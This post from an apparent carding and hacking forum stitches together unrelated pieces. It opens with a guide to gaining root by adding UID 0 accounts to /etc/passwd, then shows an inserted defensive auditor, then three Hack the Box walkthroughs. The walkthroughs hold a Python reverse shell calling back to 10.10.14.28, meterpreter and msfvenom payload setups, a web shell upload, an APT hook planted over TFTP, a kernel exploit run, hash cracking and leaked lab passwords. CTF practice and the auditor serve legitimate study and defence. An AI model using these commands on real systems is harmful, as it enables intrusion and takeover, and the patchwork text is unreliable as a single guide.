Blackhat Carding Forum | Carding Forum - Credit Cards - Hacking Forum - Cracking Forum | Bhcforums.cc
[Guide] How to Edit the /etc/passwd File for Privilege Escalation




[Guide] How to Edit the /etc/passwd File for Privilege Escalation - NINZA - 05-14-2020

In this article, we will learn “Various methods to alter the /etc/passwd file to create or modify a user for root privileges”. Sometimes it is necessary to know how to edit your own user inside the /etc/passwd file for privilege escalation once the target is compromised. You can read our previous articles where we applied this trick for privilege escalation. Open the links given below:

[To see content please register here]: Hack the Box Challenge: Apocalyst Walkthrough
[To see content please register here]: Hack the Hackday Albania VM (CTF Challenge)
First, we should understand the /etc/passwd file in depth before getting to the point. Inside the /etc directory there are three important files: passwd, group and shadow.
/etc/passwd: a human-readable text file that stores user account information.
/etc/group: also a human-readable text file; it stores group information, and which groups a user belongs to can be identified through this file.
/etc/shadow: a file that contains the encrypted password and account expiry information for each user.
The format of entries in the /etc/passwd file
[Image: 0.png?w=687]
[Image: 1.1.png?w=687]
Field descriptions
Username: The first field indicates the name of the user, which is used to log in.
Encrypted password: The x denotes that the encrypted password is actually stored inside the /etc/shadow file. If the user does not have a password, the password field will contain an * (asterisk).
User ID (UID): Every user must be allotted a user ID (UID). UID 0 (zero) is reserved for the root user, UIDs 1-99 are reserved for other predefined accounts, and UIDs 100-999 are reserved by the system for administrative purposes. UID 1000 is almost always the first non-system user, usually an administrator. If we create a new user on our Ubuntu system, it will be given UID 1001.
Group ID (GID): It denotes the primary group of each user; like UIDs, the first 100 GIDs are usually reserved for system use. GID 0 is the root group, and GID 1000 usually signifies the users group. New groups are generally allotted GIDs beginning from 1000.
GECOS Field: Usually this is a set of comma-separated values that gives more details about the user. The GECOS field carries the following information:
User’s full name
Building and room number or contact person
Office telephone number
Home telephone number
Any other contact information
Home Directory: Denotes the path of the user’s home directory, where all of the user’s files and programs are stored. If no directory is specified, / becomes the user’s directory.
Shell: It denotes the full path of the default shell that executes the user’s commands and displays the results.
NOTE: Each field is separated by a colon (:).
Let’s Start Now!!
Adding User by Default Method
Let’s first open the /etc/passwd file with the cat command to view the users present on our system.
[Image: 1.png?w=687]
From the image above, you can see that “raj” is the last user, with UID 1000. Here GID 1000 denotes a non-system user.
Let’s see what actually happens in the /etc/passwd file when we add a user with the adduser command. You can match the following information against the image below.
adduser user1
Username: user1
GID: 1002
UID: 1001
Enter password: (Hidden)
Home Directory: /home/user1
GECOS Field: Full Name, Room Number, Work Phone, Home Phone, Other (left blank)
[Image: 2.png?w=687]
When you open the /etc/passwd file, you will notice that all of the above information has been stored in it.
[Image: 3.png?w=687]
Manually Editing User inside /etc/passwd File
Generally, a normal user has read-only permission on the passwd file, but sometimes a user has read/write permission; in that scenario we can add our own user inside /etc/passwd with the help of the theory above.
user2:*:1002:1003:,,,:/home/user2:/bin/bash
The * (asterisk) sign denotes an empty password for user2.
[Image: 4.png?w=687]
Since we have allotted GID 1003 to user2, we need to add it to the /etc/group file too.
Follow the format given below:
Syntax: Username:X:GID
Since we don’t have a password, use the * sign in place of X.
user2:*:1003:
[Image: 5.png?w=687]
Now set a password for user2 with the passwd command and enter the password.
passwd user2
[Image: 6.png?w=687]
Since we created the new user ‘user2’ manually without the adduser command, we will not find a new entry in the /etc/shadow file. But it is there in /etc/passwd, where the * sign has been replaced by the encrypted password value. In this way, we can create our own user for privilege escalation.
[Image: 7.png?w=687]
OpenSSL
Sometimes it is not possible to execute the passwd command to set a user’s password; in that case we can use the openssl command, which generates an encrypted password with a salt.
openssl passwd computes the hash of the given password using the salt string and the MD5-based BSD password algorithm 1.
Syntax: openssl passwd -1 -salt [salt value] {password}
openssl passwd -1 -salt user3 pass123
[Image: 8.png?w=687]
We will get the encrypted password; after that, open the passwd file by typing the vipw command in the terminal and add the username manually. Follow the manual steps for adding the new user “user3” and paste the encrypted value in place of * or x for the password.
In the image below you can observe that I have allotted UID 0, GID 0 and the home directory /root/root, hence we have given root privileges to our user3.
[Image: 9.png?w=687]
Now switch user, access the terminal as user3 and confirm root access.
su user3
whoami
id

YESSSSSS it is working successfully.
Note: You can also modify another user’s password by replacing the x in the password field with your own encrypted password and logging in to that user account with your password.
[Image: 10.png?w=687]
mkpasswd
mkpasswd is similar to openssl passwd; it generates a hash of the given password string.
Syntax: mkpasswd -m [hash type] {password}
mkpasswd -m SHA-512 pass
[Image: 11.png?w=687]
It will generate a hash of your password string; repeat the above steps or change the password of an existing user.
If you compare the entry of user1, you will notice the difference: we have replaced the x with our hash value.
[Image: 13.png?w=687]
Now switch user, access the terminal as user1 and confirm root access.
su user1
whoami
id

Great!! It is also working.
[Image: 14.png?w=687]
Python
Using Python, we can import the crypt library and add a salt to our password; it will create the encrypted password including that salt value.
python -c 'import crypt; print(crypt.crypt("pass", "$6$salt"))'
[Image: 15.png?w=687]
It will generate a hash value of your password string; repeat the above steps or change the password of an existing user. If you compare the entry of user2, you will notice the difference: we have replaced the old hash value with our new hash value.
[Image: 16.png?w=687]
Now switch user, access the terminal as user2 and confirm root access.
su user2
whoami
id
pwd
sudo -l

It is also working; previously its home was the /home/user2 directory, but after becoming a member of the /root directory you can notice it has all the privileges of the root user.
[Image: 17.png?w=687]
Perl
Similarly, we can use Perl with crypt to generate a hash value for our password using a salt value.
perl -le 'print crypt("pass123", "abc")'
[Image: 20.png?w=687]
You will get the encrypted password; after that, again open the passwd file by typing the vipw command in the terminal and add the username manually. Follow the manual steps for adding the new user “user4” and paste the encrypted value in place of * or x for the password.
In the image below you can observe that I have allotted UID 0, GID 0 and the home directory /root/root, hence we have given root privileges to our user4.
[Image: 21.png?w=687]
Now switch user, access the terminal as user4 and confirm root access.
su user4
whoami
id

Great!! This method is also working.
[Image: 22.png?w=687]
PHP
Similarly, we can use PHP with crypt to generate the hash for our password using a salt value.
php -r "print(crypt('aarti','123') . \"\n\");"
[Image: 23.png?w=687]
You will get the encrypted password; after that, open the passwd file by typing the vipw command in the terminal and add the username manually. Follow the manual steps for adding the new user “user5” and paste the encrypted value into the password field.
In the image below you can observe that I have allotted UID 0, GID 0 and the home directory /root/root, hence we have given root privileges to our user5.
[Image: 24.png?w=687]
Now switch user, access the terminal as user5 and confirm root access.
su user5
whoami
id

Hence there are many ways to add your own user with root access, which is quite helpful for gaining root privileges on a machine.
[Image: 25.png?w=687]
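Every variant above leaves the same traces in /etc/passwd: a hash where the x should be, a second UID 0, a GID with no /etc/group entry, a home under /root, or a passwd file that was writable in the first place. The following auditor is an added example, not code from the original post; the sample file contents, hash strings and function names are all constructed for illustration.

```python
# Added example (not from the original post): audit /etc/passwd and /etc/group
# for the tampering patterns described above. Sample data and function names
# are constructed for illustration.
import stat
from dataclasses import dataclass

# Constructed sample data: user2 has a hash pasted straight into passwd and was
# never added to /etc/group; user3 is a second UID 0 account homed under /root.
# The hash strings are placeholders, not real digests.
SAMPLE_PASSWD = """\
root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
raj:x:1000:1000:raj,,,:/home/raj:/bin/bash
user1:x:1001:1002:,,,:/home/user1:/bin/bash
user2:$6$salt$CONSTRUCTEDHASHVALUE:1002:1003:,,,:/home/user2:/bin/bash
user3:$1$user3$CONSTRUCTEDHASHVALUE:0:0:,,,:/root/root:/bin/bash
"""
SAMPLE_GROUP = """\
root:x:0:
daemon:x:1:
raj:x:1000:
user1:x:1002:
"""

# Password-field values that carry no hash: 'x' defers to /etc/shadow,
# '*', '!' and '!!' are lock markers, '' means no password at all.
NON_HASH_MARKERS = {"x", "*", "!", "!!", ""}


@dataclass
class PasswdEntry:
    name: str
    passwd: str
    uid: int
    gid: int
    gecos: str
    home: str
    shell: str


def parse_passwd(text):
    """Parse the seven colon-separated fields of each /etc/passwd line."""
    entries = []
    for lineno, line in enumerate(text.splitlines(), 1):
        if not line.strip() or line.startswith("#"):
            continue
        fields = line.split(":")
        if len(fields) != 7:
            raise ValueError(f"line {lineno}: expected 7 fields, got {len(fields)}")
        name, passwd, uid, gid, gecos, home, shell = fields
        entries.append(PasswdEntry(name, passwd, int(uid), int(gid), gecos, home, shell))
    return entries


def parse_group_gids(text):
    """Collect the GIDs defined in /etc/group (name:passwd:gid:members)."""
    gids = set()
    for line in text.splitlines():
        fields = line.split(":")
        if len(fields) == 4 and fields[2].isdigit():
            gids.add(int(fields[2]))
    return gids


def audit_text(passwd_text, group_text):
    """Return (username, finding) pairs for suspicious passwd entries."""
    group_gids = parse_group_gids(group_text)
    findings = []
    seen_uid = {}  # uid -> first account seen with it
    for e in parse_passwd(passwd_text):
        if e.passwd not in NON_HASH_MARKERS:
            findings.append((e.name, "password hash stored in /etc/passwd, bypassing /etc/shadow"))
        if e.passwd == "":
            findings.append((e.name, "empty password field"))
        if e.uid == 0 and e.name != "root":
            findings.append((e.name, "UID 0 account other than root"))
        if e.gid == 0 and e.name != "root":
            findings.append((e.name, "GID 0 (root group) on a non-root account"))
        if e.name != "root" and (e.home == "/root" or e.home.startswith("/root/")):
            findings.append((e.name, f"home directory {e.home} is under /root"))
        if e.gid not in group_gids:
            findings.append((e.name, f"GID {e.gid} has no entry in /etc/group"))
        if e.uid in seen_uid:
            findings.append((e.name, f"duplicate UID {e.uid}, also used by {seen_uid[e.uid]}"))
        else:
            seen_uid[e.uid] = e.name
    return findings


def is_writable_by_others(mode):
    """True if an st_mode grants group or world write, the precondition for the
    manual-edit technique above (passwd should be mode 0644, owned by root)."""
    return bool(mode & (stat.S_IWGRP | stat.S_IWOTH))


if __name__ == "__main__":
    for name, finding in audit_text(SAMPLE_PASSWD, SAMPLE_GROUP):
        print(f"{name}: {finding}")
```

On a live host, feed audit_text() the contents of /etc/passwd and /etc/group and pass os.stat("/etc/passwd").st_mode to is_writable_by_others(); the sample run reports only user2 and user3.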

Hello Friends!! Today we are going to solve a CTF challenge, “Tally”. It is a lab developed by Hack the Box, which has an amazing collection of online labs on which you can practice your penetration testing skills. These labs are designed for beginners through to expert penetration testers. Tally is a retired lab.
Level: Medium
Task: Find the user.txt and root.txt in the vulnerable Lab.
Let’s Begin!!
As these labs are only available online, they have a static IP. The Tally lab has IP 10.10.10.59.
Now, as always, let’s begin with port enumeration.
nmap -A 10.10.10.59
[Image: 1.png?w=687&ssl=1]
When you explore the target IP in the browser, it redirects to a SharePoint page as shown below, which nmap also reported in the image above.
[Image: 2.png?w=687&ssl=1]
Then we used several directory brute-forcing tools to enumerate useful web directory URLs, but failed to retrieve any. Then I searched for the web directory manually with the help of Google and gradually reached /sitepages/FinanceTeam.aspx, where I found the FTP username, as shown in the image below.
Moreover, I found a [To see content please register here] for SharePoint directory brute-force attacks that helped me in my next step.

[Image: 6.png?w=687&ssl=1]
We found the URL [To see content please register here] documents/forms/allitems.aspx inside the above-given [To see content please register here], and when you open that path in your browser as shown below, you will see a file named “FTP-details”. Download this doc file and open it.

[Image: 9.png?w=687&ssl=1]
You will get a password from inside the FTP-details doc file.
[Image: 10.png?w=687&ssl=1]
Now log in to FTP using the following credentials and download tim.kdbx to your local machine.
Username: ftp_user
Password: UTDRSCH53c"$6hys

[Image: 12.png?w=687&ssl=1]
Since the file has a .kdbx extension and I didn’t know much about it, I turned to Google, where I found this [To see content please register here] to download a Python script that extracts a Hashcat/John-crackable hash from KeePass 1.x/2.x databases.

python keepass2john.py tim.kdbx > tim
Next, we used John the Ripper to crack the hash in “tim” with the following command.
john --format=KeePass --wordlist=/usr/share/wordlists/rockyou.txt tim
[Image: 13.png?w=687&ssl=1]
When you obtain the password for “keepass2”, an application used for keeping your system passwords hidden, you need to install it with the following command:
apt-get install keepass2 -y
After installing, run the command below and submit “simplementeyo” in the master key field.
keepass2 tim.kdbx
Then you can find the username and password inside /Work/Windows/Shares for SMB login, since ports 135-445 are open on the target machine for file sharing.
Here the password is hidden behind * characters; copy and paste it into a text file and you will get the password in plain letters, i.e. Acc0unting.
[Image: 14.png?w=687&ssl=1]
Now that you have the SMB login credentials “Finance: Acc0unting”, execute the following command to connect to the target network; it will show “ACCT” as a share name.
smbclient -L 10.10.10.59 -U Finance
[Image: 15.png?w=687&ssl=1]
Further, type the commands below, and when you find conn-info.txt, download it.
smbclient //10.10.10.59/ACCT -U Finance
cd zz_Archived
cd SQL
get conn-info.txt

[Image: 16.png?w=687&ssl=1]
When you download and open the conn-info.txt file, it gives you the MSSQL database login credentials.
db: sa
pass: YE%TJC%&HYbe5Nw

From the image below, you can observe that these were old server details, and the password for sa might have been changed.
[Image: 17.png?w=687&ssl=1]
Log in to SMB again and look for the next hint by moving into /zz_Migration; for that you need to execute the commands below:
smbclient //10.10.10.59/ACCT -U Finance
cd zz_Migration
cd Binaries
cd "New folder"

Here you will find tester.exe; download it.
get tester.exe
[Image: 18.png?w=687&ssl=1]
You will get tester.exe inside your /root directory. Since the file is large, it is hard to find the desired information by reading it directly, so use grep along with the strings command.
[Image: 19.1.png?w=687&ssl=1]
strings tester.exe | grep DATABASE
And you will get a new password for the user sa, as shown in the image below.
[Image: 19.2.png?w=687&ssl=1]
For the next step, I took help from our [To see content please register here] article on MSSQL penetration testing. Open a new terminal, load the Metasploit framework and execute the commands below.

use exploit/multi/script/web_delivery
msf exploit(multi/script/web_delivery) > set target 3
msf exploit(multi/script/web_delivery) > set payload windows/meterpreter/reverse_tcp
msf exploit(multi/script/web_delivery) > set lhost 10.10.14.28
msf exploit(multi/script/web_delivery) > set srvhost 10.10.14.28
msf exploit(multi/script/web_delivery) > exploit

Copy the highlighted text for the .dll and paste it as the CMD command, as shown in the next image.
[Image: 19.png?w=687&ssl=1]
Now open a new terminal, load the Metasploit framework again and execute the commands below.
use auxiliary/admin/mssql/mssql_exec
msf auxiliary(admin/mssql/mssql_exec) > set rhost 10.10.10.59
msf auxiliary(admin/mssql/mssql_exec) > set password GWE3V65#6KFH93@4GWTG2G
msf auxiliary(admin/mssql/mssql_exec) > set CMD "Paste above copied .dll text here"
msf auxiliary(admin/mssql/mssql_exec) > exploit

[Image: 20.png?w=687&ssl=1]
You will get a meterpreter session on the victim’s machine in your first Metasploit console; then finish the task by grabbing the user.txt and root.txt files. Further, type the following:
getuid
So currently we don’t have NT AUTHORITY\SYSTEM permissions.
[Image: 21.png?w=687&ssl=1]
But we have successfully grabbed the user.txt file from inside /Sarah/Desktop.
cd Sarah/Desktop
ls
cat user.txt

In this way, we have completed our first task. Now let’s find root.txt!!
[Image: 22.png?w=687&ssl=1]
load incognito
The incognito extension in the meterpreter session was originally a stand-alone application that lets you impersonate user tokens after successfully compromising a system. The first thing we need to do is identify whether there are any valid tokens on this system.
list_tokens -u
As for impersonation tokens, you can see that currently no token is available.
[Image: 23.png?w=687&ssl=1]
Then I took help from Google in this scenario and found a link to download RottenPotato from GitHub for privilege escalation.
git clone

[To see content please register here]


After downloading, you will get the rottenpotato.exe file.
[Image: 24.png?w=687&ssl=1]
Upload the exe file into the victim’s machine.
upload /root/Desktop/RottenPotato/rottenpotato.exe .
Now type the commands below to execute the exe file and then add the SYSTEM token under impersonated user tokens.
execute -Hc -f rottenpotato.exe
impersonate_token "NT AUTHORITY\\SYSTEM"

After that, when you run the getuid command again, it will tell you that you have escalated to NT AUTHORITY\SYSTEM.
[Image: 25.png?w=687&ssl=1]
Then go back to the /Users directory and look at the directories inside it. You will get root.txt from inside C:\Users\Administrator\Desktop; go and grab it to finish the task.
cd Administrator
cd Desktop
ls
cat root.txt

Fabulous!! The task has been completed and we have hacked this box.
[Image: 27.png?w=687&ssl=1]

Hello friends!! Today we are going to solve another challenge, “Inception”, which is categorised as a retired lab presented by Hack the Box for online penetration practice. Solving the challenges in this lab is not that easy; you have to use your entire penetration testing skill set. Let’s start and learn how to breach a network and then exploit it to retrieve the desired information.
Level: Hard
Task: find user.txt and root.txt file on the victim’s machine.
Since these labs are accessible online, they have a static IP. The IP of Inception is 10.10.10.67, so let’s start with nmap port enumeration.
nmap -A 10.10.10.67
From the image below, you can observe that ports 80 and 3128 are open on the victim’s network.
[Image: 1.png?w=687&ssl=1]
Knowing port 80 was open on the victim’s network, we explored the IP in the browser and the following page opened, as shown below.
[Image: 2.png?w=687&ssl=1]
Then we checked its source code and found “dompdf”, which could be a directory, so let’s go through it.
[Image: 3.png?w=687&ssl=1]
When we explored /dompdf in the browser, it listed some files. I was interested in the version, so we opened it and found version 0.6.0.
[Image: 4.png?w=687&ssl=1]
After that, with the help of searchsploit, we got exploit 33004.txt for dompdf 0.6.0.
[Image: 6.png?w=687&ssl=1]
In this exploit, you will find an example of exploiting the target machine with the help of LFI.
[Image: 7.png?w=687&ssl=1]
Then, without wasting time, we looked for the /etc/passwd file with the help of the following command:
curl

[To see content please register here]


But we got an encoded result, so we need to decode it.
[Image: 8.png?w=687&ssl=1]
From the image below you can observe that we successfully decoded the base64 data and can read the first username, Cobb.
[Image: 9.png?w=687&ssl=1]
After digging much deeper, we found the default.conf file inside the Apache directory, which holds another base64 value; now use the command below for that.

[To see content please register here]


[Image: 10.png?w=687&ssl=1]
After decoding the base64 value found above, you will get the highlighted path for AuthUserFile, as shown in the image below. If you read the text inside the <Location> tag, you will realise that it hints at login credentials for /webdev_test_inception and gives more security details, such as authentication type: basic.
[Image: 11.png?w=687&ssl=1]
Again type the following command:
curl

[To see content please register here]


Hmmmmm!!! One more base64 value; let’s decode this one as well.
[Image: 12.png?w=687&ssl=1]
When we decoded the above base64 value, we found a hash for the user “webdav_tester”. We copied it into a text file and will now use John the Ripper to crack this hash.
[Image: 13.png?w=687&ssl=1]
Type the following command to crack the hash with the help of rockyou.txt:
john hash --wordlist=/usr/share/wordlists/rockyou.txt
Great!! It gives “babygurl69”
[Image: 16.png?w=687&ssl=1]
So now we have the username “webdav_tester” and the password “babygurl69” for login to /webdev_test_inception, and since the authentication type is basic, we can use cadaver to upload a backdoor.
Type the following commands to upload the PHP backdoor:
cadaver

[To see content please register here]

webdav_tester
babygurl69
put /root/Desktop/qsd-php-backdoor.php

While uploading the PHP backdoor we tried many types of PHP backdoor, but among them qsd-php-backdoor.php worked; its default location is /usr/share/webshells/php.
[Image: 17.png?w=687&ssl=1]
Then we opened the uploaded PHP shell in the browser and clicked “go to current working directory”.
http://webdav_test_inception/qsd-php-backdoor.php
[Image: 18.png?w=687&ssl=1]
It brings us into the /html directory, where we saw WordPress 4.8.3 and opened it.
[Image: 19.png?w=687&ssl=1]
Then we explored the /wp-config.php file and found the username “root” and password “VwPddNh7xMZyDQoByQL4”. We also tried to log in to WordPress, but it was not active.
[Image: 21.png?w=687&ssl=1]
Again we came back to the previous page, as shown below, and typed the following command into the execute-shell text field to identify all running services inside the network.
netstat -antp
[Image: 22.png?w=687&ssl=1]
Here we found SSH open on the internal network and also observed a new interface, 192.168.0.10.
[Image: 23.png?w=687&ssl=1]
Since we know port 3128 is open for the Squid HTTP proxy, open /etc/proxy.conf and add it there, as shown in the image below.
[Image: 24.png?w=687&ssl=1]
Now connect to SSH through proxychains using the command below and submit the password found inside /wp-config.php for the user cobb.
proxychains ssh [email protected]
Nice!!! It works and we logged in successfully; let’s grab user.txt first, as shown.
[Image: 25.png?w=687&ssl=1]
Then, to find the root.txt flag, we need privilege escalation, so type the sudo -l command, which tells you the permissions set for the user cobb. You will see that Cobb has ALL permissions. Then we executed sudo su, got root access and moved on to the root.txt file.
Dammitttttttt!!!!! It was a bloody trap, not the real root access.
[Image: 26.png?w=687&ssl=1]
ifconfig tells us the IP is 192.168.0.10; we then thought to ping 192.168.0.1, and the host was up.
[Image: 27.png?w=687&ssl=1]
Then, with the help of the following command, we came to know that ports 21, 22 and 53 were open.
nc -zv 192.168.0.1 1-65535 &> results && cat results | grep succeeded
We successfully logged in to FTP using anonymous:anonymous and ran the ls command to list all directories and files.
[Image: 29.png?w=687&ssl=1]
Inside /etc we saw three files: passwd, crontab, and tftpd-hpa in /default. We downloaded all three files.
cd /etc
get passwd
get crontab
cd default
get tftpd-hpa

[Image: 30.png?w=687&ssl=1]
Then we read all three files with cat.
cat /etc/passwd
cat /default/tftpd-hpa

[Image: 31.png?w=687&ssl=1]
cat crontab
Here we saw something very interesting: every 5 minutes an apt-update command is run.
[Image: 32.png?w=687&ssl=1]
Then we generated an SSH key pair by executing the following command:
ssh-keygen
[Image: 33.png?w=687&ssl=1]
Now enter the following commands to upload the public key to 192.168.0.1 using TFTP:
cd /root/.ssh
tftp 192.168.0.1
put id_rsa.pub /root/.ssh/authorized_keys

Since TFTP gives full permissions to the authorized_keys file, meaning anyone can read and write it, SSH public-key login fails because of the incorrect permissions; it should be 600. Now exit tftp and change the authorized_keys permissions on that host.
quit
We were not sure how to change the permissions through the apt-update command, so we searched Google and luckily found a [To see content please register here] that helped us generate an apt update hook to change the authorized_keys permissions.

echo 'APT::Update::Pre-Invoke {"chmod 600 /root/.ssh/authorized_keys"};' > rootshell
tftp 192.168.0.1
put rootshell /etc/apt/apt.conf.d/rootshell
quit
ssh [email protected]

Wait for 5 minutes and you will get root access. After that, grab the root.txt flag and hit the GOAL!!!
[Image: 34.png?w=687&ssl=1]

Hello Friends!! Today we are going to solve a CTF challenge, “Bashed”. It is a lab developed by Hack the Box, which has an amazing collection of online labs on which you can practice your penetration testing skills. Their labs are designed for beginners through to expert penetration testers. Bashed is a retired lab.
Level: Medium
Task: Find the user.txt and root.txt in the vulnerable Lab.
Let’s Begin!
As these labs are only available online, they have a static IP. The Bashed lab has IP 10.10.10.68.
Now, as always, let’s begin with port enumeration.
nmap -A 10.10.10.68
[Image: 1.png?w=687&ssl=1]
Knowing port 80 is open on the victim’s network, we explored the IP in the browser and the following page opened, as shown below.
[Image: 2.png?w=687&ssl=1]
Next, we used the dirb tool from Kali to enumerate directories and found some important ones, such as /dev.
[Image: 3.png?w=687&ssl=1]
When you open the /dev directory in the browser, you will get a link to phpbash.php. Click on that link.
[Image: 4.png?w=687&ssl=1]
It redirects to the following page, shown below, which looks like a shell interacting through the browser.
After that, you can execute any arbitrary OS command to test whether it works. We ran the ls command to list the contents of the current directory.
[Image: 5.png?w=687&ssl=1]
Inside the /html directory we found an uploads folder, so now we can easily compromise the target system by uploading a backdoor.
[Image: 6.png?w=687&ssl=1]
Using msfvenom, we created a malicious shell.php file by executing the following command.
msfvenom -p php/meterpreter/reverse_tcp lhost=10.10.14.28 lport=4444 -f raw
Simultaneously, run multi/handler for the reverse connection from the victim’s system.
[Image: 7.png?w=687&ssl=1]
We used the Python HTTP server to transfer the file; you can also use an alternative transfer method, and download the malicious file with wget inside the uploads directory.
[Image: 9.png?w=687&ssl=1]
Now execute the malicious file shell.php from the browser as shown below and move to the Metasploit framework for the reverse connection.
[Image: 10.png?w=687&ssl=1]
After executing the uploaded backdoor file, come back to the Metasploit framework and wait for the meterpreter session.
msf > use exploit/multi/handler
msf exploit(multi/handler) > set payload php/meterpreter/reverse_tcp
msf exploit(multi/handler) > set lhost 10.10.14.28
msf exploit(multi/handler) > set lport 4444
msf exploit(multi/handler) > exploit

From the image below you can observe that meterpreter session 1 opened for accessing the victim’s TTY shell.
Now let’s finish the task by grabbing the user.txt and root.txt files. First I moved into the /home directory and checked the files and directories inside it.
cd /home
ls

Here there was one directory, arrexel; when I explored /home/arrexel I saw user.txt and used the cat command to read it.
cd arrexel
ls
cat user.txt

Great!! Here we completed the 1st task; now move on to the 2nd task.
[Image: 11.png?w=687&ssl=1]
To spawn a proper TTY shell on the target system we need to import the Python pty module, so I ran the following commands inside the meterpreter shell:
shell
python -c 'import pty;pty.spawn("/bin/bash")'
lsb_release -a

[Image: 12.png?w=687&ssl=1]
Run the ls -al command to see all directories with their permissions. Here you will notice that the user scriptmanager has permission to access the /scripts directory.
[Image: 13.0.png?w=687&ssl=1]
When we tried to open the /scripts directory as the default user, it showed a Permission Denied message. Then run the sudo -l command, which tells us that scriptmanager has NOPASSWD for all commands.
Then we ran the following commands to look into the scripts folder with the help of scriptmanager:
sudo -u scriptmanager ls /scripts
sudo -u scriptmanager cat /scripts/test.py
sudo -u scriptmanager cat /scripts/test.txt

Since we found a Python file, our strategy is to replace the original test.py with a malicious Python file that gives us a reverse connection over netcat; for that, you need to save the following code in a text file.
import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("10.10.14.28",1234));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call(["/bin/sh","-i"]);
Save this file with a .py extension, transfer it to the victim’s system and start netcat on the listening port.
Note: Replace 10.10.14.28 inside the code with your VPN IP.
[Image: 13.1.png?w=687&ssl=1]
Now download the malicious Python file inside /tmp:
wget

[To see content please register here]


And then copy root.py from /tmp to test.py in /scripts with the help of the following command.
sudo -u scriptmanager cp /tmp/root.py /scripts/test.py
[Image: 13.2.png?w=687&ssl=1]
After some time you will get a reverse connection at the netcat terminal with root access. Now finish the task by capturing the root.txt file as shown below.
nc -lvp 1234
id
cd /root
ls
cat root.txt

[Image: 13.3.png?w=687&ssl=1]
2nd method for finding the root.txt flag.
We found the machine architecture 14.0 in the above method, so we started looking for a related kernel exploit on Google and luckily found an exploit from [To see content please register here] for root privilege escalation.

Copy and paste the whole text into a text file and save it as poc.c.
[Image: 13.png?w=687&ssl=1]
After that, compile it with the help of the following command:
gcc poc.c -o pwn
Run the Python HTTP server to transfer it to the target system.
[Image: 14.png?w=687&ssl=1]
Finally, download the compiled file pwn to the target machine with wget inside /dev/shm as shown in the image, then give it full permissions and run the file.
wget

[To see content please register here]

chmod 777 pwn
./pwn

It will give you root access; now grab the root.txt flag as soon as possible, because it will crash the kernel after some time.
cd /root
cat root.txt

Superb!! We completed the task and hacked this box.
[Image: 15.png?w=687&ssl=1]